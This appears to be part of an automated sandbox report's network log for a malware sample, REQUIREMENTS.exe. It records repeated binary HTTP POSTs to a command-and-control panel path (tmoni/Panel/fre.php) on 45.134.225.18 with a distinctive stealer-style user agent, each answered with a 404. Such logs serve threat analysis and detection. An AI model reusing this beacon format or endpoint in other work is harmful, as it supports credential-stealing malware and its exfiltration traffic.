                254192.168.2.54999045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                255192.168.2.54999145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                256192.168.2.54999245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                257192.168.2.54999345.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                258192.168.2.54999445.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                259192.168.2.54999545.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                26192.168.2.54974945.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:34.092808962 CET122OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:34.178958893 CET123INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:34 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                260192.168.2.54999645.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                261192.168.2.54999745.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                262192.168.2.54999845.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                263192.168.2.54999945.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                264192.168.2.55000045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                265192.168.2.55000145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                266192.168.2.55000245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                267192.168.2.55000345.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                268192.168.2.55000445.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                269192.168.2.55000545.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                27192.168.2.54975045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:34.387134075 CET123OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:34.472249031 CET124INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:34 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                270192.168.2.55000645.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                271192.168.2.55000745.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                272192.168.2.55000845.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                273192.168.2.55000945.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                274192.168.2.55001045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                275192.168.2.55001145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                276192.168.2.55001245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                277192.168.2.55001345.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                278192.168.2.55001445.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                279192.168.2.55001545.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                28192.168.2.54975145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:34.744117975 CET125OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:34.831981897 CET125INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:35 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                280192.168.2.55001645.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                281192.168.2.55001745.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                282192.168.2.55001845.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                283192.168.2.55001945.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                284192.168.2.55002045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                285192.168.2.55002145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                286192.168.2.55002245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                287192.168.2.55002345.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                288192.168.2.55002445.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                289192.168.2.55002545.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                29192.168.2.54975245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:35.102505922 CET126OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:35.189085960 CET127INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:35 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                290192.168.2.55002645.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                291192.168.2.55002745.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                292192.168.2.55002845.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                293192.168.2.55002945.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                294192.168.2.55003045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                295192.168.2.55003145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                296192.168.2.55003245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                297192.168.2.55003345.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                298192.168.2.55003445.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                299192.168.2.55003545.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                3192.168.2.54972345.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:27.336148977 CET81OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:27.425896883 CET82INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:27 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                30192.168.2.54975345.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:35.374332905 CET127OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:35.459928036 CET128INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:35 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                300192.168.2.55003645.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                301192.168.2.55003745.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                302192.168.2.55003845.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                303192.168.2.55003945.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                304192.168.2.55004045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                305192.168.2.55004145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                306192.168.2.55004245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                307192.168.2.55004345.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                308192.168.2.55004445.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                309192.168.2.55004545.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                31192.168.2.54975445.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:36.034435034 CET129OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:36.120300055 CET129INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:36 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                310192.168.2.55004645.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                311192.168.2.55004745.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                312192.168.2.55004845.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                313192.168.2.55004945.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                314192.168.2.55005045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                315192.168.2.55005145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                316192.168.2.55005245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                317192.168.2.55005345.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                318192.168.2.55005445.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                319192.168.2.55005545.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                32192.168.2.54975545.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:36.323666096 CET130OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:36.409691095 CET131INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:36 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                320192.168.2.55005645.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                321192.168.2.55005745.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                322192.168.2.55005845.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                323192.168.2.55005945.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                324192.168.2.55006045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                325192.168.2.55006145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                326192.168.2.55006245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                327192.168.2.55006345.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                328192.168.2.55006445.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                329192.168.2.55006545.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                33192.168.2.54975645.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:36.734836102 CET131OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:36.821665049 CET132INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:37 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                330192.168.2.55006645.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                331192.168.2.55006745.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                332192.168.2.55006845.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                333192.168.2.55006945.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                334192.168.2.55007045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                335192.168.2.55007145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                336192.168.2.55007245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                337192.168.2.55007345.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                338192.168.2.55007445.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                339192.168.2.55007545.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                34192.168.2.54975745.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:37.579022884 CET133OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:37.665335894 CET133INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:37 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                340192.168.2.55007645.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                341192.168.2.55007745.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                342192.168.2.55007845.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                343192.168.2.55007945.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                344192.168.2.55008045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                345192.168.2.55008145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                346192.168.2.55008245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                347192.168.2.55008345.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                348192.168.2.55008445.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                349192.168.2.55008545.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                35192.168.2.54975845.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:38.279542923 CET134OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:38.366384029 CET134INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:38 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                350192.168.2.55008645.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                351192.168.2.55008745.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                352192.168.2.55008845.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                353192.168.2.55008945.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                354192.168.2.55009045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                355192.168.2.55009145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                356192.168.2.55009245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                357192.168.2.55009345.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                358192.168.2.55009445.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                359192.168.2.55009545.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                36192.168.2.54975945.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:38.564531088 CET135OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:38.650496006 CET136INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:38 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
